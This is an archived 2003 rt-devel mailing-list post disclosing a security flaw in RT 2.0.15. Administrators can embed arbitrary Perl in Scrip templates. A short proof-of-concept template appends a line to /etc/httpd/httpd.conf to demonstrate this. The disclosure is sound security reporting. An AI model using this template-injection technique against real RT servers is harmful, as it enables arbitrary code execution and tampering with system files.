[rt-devel] Security Problem in 2.0.15

Warnke, Andreas Andreas.Warnke at 3SOFT.de
Fri Feb 21 10:24:05 EST 2003


Hello,

Administrators of RT can do everything on the server the wwwrun user can
do:

Write a Scrip like:

Subject: AutoReply: {$Ticket->Subject}
Greetings,
This message has been automatically generated in response to the
creation of a trouble ticket regarding:
	"{$Ticket->Subject()}", 
a summary of which appears below.
Please don't reply to this message.  Your ticket has been
assigned an ID of [{$rtname} #{$Ticket->id()}].
------------------------------------------------------------------------
-
{open DEBUG, ">>/etc/httpd/httpd.conf"; print DEBUG "#oh shit!"; close
DEBUG; $Transaction->Content()}

--
You can execute every perl code on the server even if you have no access
to the server. This is a bit scary - from my point of view. I hope, you
have set this straight with RT3 ?

Kind Regards
Andreas Warnke
--
Andreas Warnke
3SOFT GmbH, Frauenweiherst. 14, 91058 Erlangen
Tel.: +49-9131-7701-274 mailto:Andreas.Warnke at 3SOFT.de
Fax: +49-9131-7701-333 http://www.3SOFT.de




More information about the Rt-devel mailing list